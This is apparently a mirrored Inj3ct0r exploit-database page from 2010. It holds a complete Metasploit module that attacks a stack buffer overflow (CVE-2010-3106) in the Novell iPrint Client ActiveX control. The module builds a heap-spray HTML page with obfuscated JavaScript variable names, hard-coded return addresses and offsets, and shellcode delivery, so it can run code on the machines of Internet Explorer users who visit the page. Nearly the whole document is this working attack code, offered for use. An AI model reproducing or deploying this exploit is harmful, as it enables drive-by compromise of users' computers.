Home / os / win7

[remote exploits] - Novell iPrint Client ActiveX Control �

Posted on 21 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Novell iPrint Client ActiveX Control &#039;debug&#039; Buffer Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: remote exploits | Exploit author: Trancer' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================================
Novell iPrint Client ActiveX Control &#039;debug&#039; Buffer Overflow Exploit
====================================================================

##
# novelliprint_executerequest_dbg.rb
#
# Novell iPrint Client ActiveX Control &#039;debug&#039; Buffer Overflow exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
#  - Novell iPrint Client 5.32 on Internet Explorer 7, Windows XP SP3
#  - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
#  - Novell iPrint Client 5.40 on Internet Explorer 7, Windows Vista SP2
#
# ienipp.ocx version tested:
# File Version: 5.3.2.0 and 5.4.0.0
# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
#  - CVE-2010-3106
#  - OSVDB 66960
#  - http://dvlabs.tippingpoint.com/advisory/TPTI-10-06 - Original advisory by Aaron Portnoy, TippingPoint DVLabs
#  - http://www.exploit-db.com/exploits/15001/ - MOAUB #14 exploit
#  - http://www.exploit-db.com/moaub-14-novell-iprint-client-browser-plugin-executerequest-debug-parameter-stack-overflow/ - MOAUB #14 binary analysis
#  - http://www.rec-sec.com/2010/09/21/novell-iprint-debug-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##
 
require &#039;msf/core&#039;
 
class Metasploit3 &lt; Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info = {})
        super(update_info(info,
            &#039;Name&#039;           =&gt; &#039;Novell iPrint Client ActiveX Control debug Buffer Overflow&#039;,
            &#039;Description&#039;    =&gt; %q{
                    This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.
                    When sending an overly long string to the &#039;debug&#039; parameter in ExecuteRequest()
                    property of ienipp.ocx an attacker may be able to execute arbitrary code.
            },
            &#039;License&#039;        =&gt; MSF_LICENSE,
            &#039;Author&#039;         =&gt; [ &#039;Trancer &lt;mtrancer[at]gmail.com&#039; ],
            &#039;Version&#039;        =&gt; &#039;$Revision:$&#039;,
            &#039;References&#039;     =&gt;
                [
                    [ &#039;CVE&#039;, &#039;2010-3106&#039; ],
                    [ &#039;OSVDB&#039;, &#039;66960&#039;],
                    [ &#039;URL&#039;, &#039;http://dvlabs.tippingpoint.com/advisory/TPTI-10-06&#039; ],    # Aaron Portnoy, TippingPoint DVLabs
                    [ &#039;URL&#039;, &#039;http://www.exploit-db.com/exploits/15001/&#039; ],             # MOAUB #14
                ],
            &#039;DefaultOptions&#039; =&gt;
                {
                    &#039;EXITFUNC&#039; =&gt; &#039;process&#039;,
                },
            &#039;Payload&#039;        =&gt;
                {
                    &#039;Space&#039;         =&gt; 1024,
                    &#039;BadChars&#039;      =&gt; &quot;x00&quot;,
                },
            &#039;Platform&#039;       =&gt; &#039;win&#039;,
            &#039;Targets&#039;        =&gt;
                [
                    [ &#039;Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7&#039;, { &#039;Ret&#039; =&gt; 0x0A0A0A0A, &#039;Offset&#039; =&gt; 250 } ]
                ],
            &#039;DisclosureDate&#039; =&gt; &#039;Aug 04 2010&#039;,
            &#039;DefaultTarget&#039;  =&gt; 0))
    end
 
    def autofilter
        false
    end
 
    def check_dependencies
        use_zlib
    end
 
    def on_request_uri(cli, request)
        # Re-generate the payload.
        return if ((p = regenerate_payload(cli)) == nil)
 
        # Encode the shellcode.
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
         
        # Setup exploit buffers
        nops      = Rex::Text.to_unescape([target.ret].pack(&#039;V&#039;))
        ret       = Rex::Text.uri_encode([target.ret].pack(&#039;L&#039;))
        blocksize = 0x40000
        fillto    = 500
        offset    = target[&#039;Offset&#039;]
         
        # ActiveX parameters
        clsid   = &quot;36723F97-7AA0-11D4-8919-FF2D71D0D32C&quot;
        op      = &quot;op-client-interface-version&quot;
        dbg     = &quot;debug=&quot;
 
        # Randomize the javascript variable names
        ienipp       = rand_text_alpha(rand(100) + 1)
        j_shellcode  = rand_text_alpha(rand(100) + 1)
        j_nops       = rand_text_alpha(rand(100) + 1)
        j_ret        = rand_text_alpha(rand(100) + 1)
        j_headersize = rand_text_alpha(rand(100) + 1)
        j_slackspace = rand_text_alpha(rand(100) + 1)
        j_fillblock  = rand_text_alpha(rand(100) + 1)
        j_block      = rand_text_alpha(rand(100) + 1)
        j_memory     = rand_text_alpha(rand(100) + 1)
        j_op         = rand_text_alpha(rand(100) + 1)
        j_dbg        = rand_text_alpha(rand(100) + 1)
        j_counter    = rand_text_alpha(rand(30) + 2)
 
        html = %Q|&lt;html&gt;
&lt;object classid=&#039;clsid:#{clsid}&#039; id=&#039;#{ienipp}&#039;&gt;&lt;/object&gt;
&lt;script&gt;
var #{j_shellcode} = unescape(&#039;#{shellcode}&#039;);
var #{j_nops} = unescape(&#039;#{nops}&#039;);
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length &lt; #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} &lt; #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} &lt; #{fillto}; #{j_counter}++) {
    #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
 
var #{j_ret} = &#039;&#039;;
for (#{j_counter} = 0; #{j_counter} &lt;= #{offset}; #{j_counter}++) {
    #{j_ret} += unescape(&#039;#{ret}&#039;);
}
#{j_op} = &quot;#{op}&quot;; 
#{j_dbg} = &quot;#{dbg}&quot;;
#{ienipp}.ExecuteRequest(#{j_op}, #{j_dbg} + #{j_ret}); 
&lt;/script&gt;
&lt;/html&gt;|
 
        print_status(&quot;Sending exploit to #{cli.peerhost}:#{cli.peerport}...&quot;)
 
        # Transmit the response to the client
        send_response(cli, html, { &#039;Content-Type&#039; =&gt; &#039;text/html&#039; })
 
        # Handle the payload
        handler(cli)
    end
 
end


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-21]</pre></body></html>

 

TOP

Malware :

Exploits :